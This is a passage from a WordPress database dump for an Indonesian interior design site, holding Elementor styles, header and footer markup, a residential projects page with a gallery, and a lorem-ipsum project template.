ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a href=\"https://www.instagram.com/bauhausliving/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n			<h2>Explore</h2>		\n			<ul id=\"menu-menu-explore\"><li id=\"menu-item-4731\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-4732\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4733\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>		\n			<h2>Contact</h2>		\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\" target=\"_blank\" rel=\"noopener\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n		<p>© 2023 bauhaus living, develop by <a href=\"http://www.futuremediatrix.com\">futuremediatrix.com</a></p>','Footer','','publish','closed','closed','','footer','','','2023-09-22 11:05:10','2023-09-22 11:05:10','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_framework_hf_el&#038;p=103',0,'ova_framework_hf_el','',0),(107,1,'2022-06-29 04:56:26','2022-06-29 04:56:26','<div class=\"mc4wp-form\">\r\n  <div class=\"ova-mc4wp-form\">		\r\n      <div class=\"email\">\r\n          <input type=\"email\" name=\"EMAIL\" placeholder=\"Enter your email address\" required />\r\n      </div>\r\n      <div class=\"submit\">\r\n 		<button type=\"submit\">\r\n          <i class=\"ovaicon ovaicon-next-4\"></i>\r\n    	</button>\r\n      </div>\r\n    </div>\r\n</div>\r\n','footer','','publish','closed','closed','','footer','','','2022-06-29 04:56:26','2022-06-29 04:56:26','',0,'https://demo.ovatheme.com/retirio/mc4wp-form/footer/',0,'mc4wp-form','',0),(139,1,'2022-06-07 08:23:03','2022-06-07 08:23:03','','lines','','inherit','open','closed','','lines','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',103,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/lines.png',0,'attachment','image/png',0),(145,1,'2022-06-07 08:27:16','2022-06-07 08:27:16','','bg-footer-right','','inherit','open','closed','','bg-footer-right','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',103,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-footer-right.png',0,'attachment','image/png',0),(169,1,'2022-06-07 09:06:59','2022-06-07 09:06:59','<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:57px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-30\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-774\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4715\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-4675\"><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li id=\"menu-item-4691\"><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li id=\"menu-item-4762\"><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li id=\"menu-item-773\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://bauhaus.futuremediatrix.com/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>			</nav>\n        </nav>\n					 	<!-- Display when you choose background per Post -->\n														<h1>\n															</h1>\n								<ul><li><a href=\"https://bauhaus.futuremediatrix.com/\" title=\"Home\">Home</a></li> <li></li><li>Builder Header Footer</li></ul>','Header Banner 1','','publish','closed','closed','','header-banner','','','2023-09-26 13:27:08','2023-09-26 13:27:08','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_framework_hf_el&#038;p=169',0,'ova_framework_hf_el','',0),(176,1,'2022-06-07 09:16:53','2022-06-07 09:16:53','','bg-header-banner-50','','inherit','open','closed','','bg-header-banner-50','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',169,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-header-banner-50.jpg',0,'attachment','image/jpeg',0),(193,1,'2022-06-08 10:30:27','2022-06-08 10:30:27','','vintage-deign','','inherit','open','closed','','vintage-deign','','','2022-06-08 10:30:27','2022-06-08 10:30:27','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/vintage-deign.jpg',0,'attachment','image/jpeg',0),(217,1,'2022-06-09 01:24:03','2022-06-09 01:24:03','','image','','inherit','open','closed','','image','','','2022-06-09 01:24:03','2022-06-09 01:24:03','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image.jpg',0,'attachment','image/jpeg',0),(230,1,'2022-06-09 01:27:02','2022-06-09 01:27:02','','image-2','','inherit','open','closed','','image-2','','','2022-06-09 01:27:02','2022-06-09 01:27:02','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2.jpg',0,'attachment','image/jpeg',0),(560,1,'2022-06-13 09:18:18','2022-06-13 09:18:18','<h3>our recent work</h3>\n														<h2>\n								Bauhaus Residential Projects							</h2>\n							<p> Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya. </p>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTEuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTIuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTMuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-4\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTQuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTUuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-6\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTYuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTcuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>','Residential','','publish','closed','closed','','residential','','','2023-09-22 08:37:59','2023-09-22 08:37:59','',0,'https://demo.ovatheme.com/retirio/?page_id=560',0,'page','',0),(576,1,'2022-06-13 09:41:43','2022-06-13 09:41:43','','image-simple home','','inherit','open','closed','','image-simple-home','','','2022-06-13 09:41:43','2022-06-13 09:41:43','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-simple-home.jpg',0,'attachment','image/jpeg',0),(589,1,'2022-06-14 01:42:29','2022-06-14 01:42:29','','gallery-1','','inherit','open','closed','','gallery-1','','','2022-06-14 01:42:29','2022-06-14 01:42:29','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-1.jpg',0,'attachment','image/jpeg',0),(590,1,'2022-06-14 01:42:30','2022-06-14 01:42:30','','gallery-2','','inherit','open','closed','','gallery-2','','','2022-06-14 01:42:30','2022-06-14 01:42:30','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-2.jpg',0,'attachment','image/jpeg',0),(591,1,'2022-06-14 01:42:31','2022-06-14 01:42:31','','gallery-3','','inherit','open','closed','','gallery-3','','','2022-06-14 01:42:31','2022-06-14 01:42:31','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/gallery-3.jpg',0,'attachment','image/jpeg',0),(613,1,'2022-06-14 02:15:17','2022-06-14 02:15:17','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Modern villa</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" 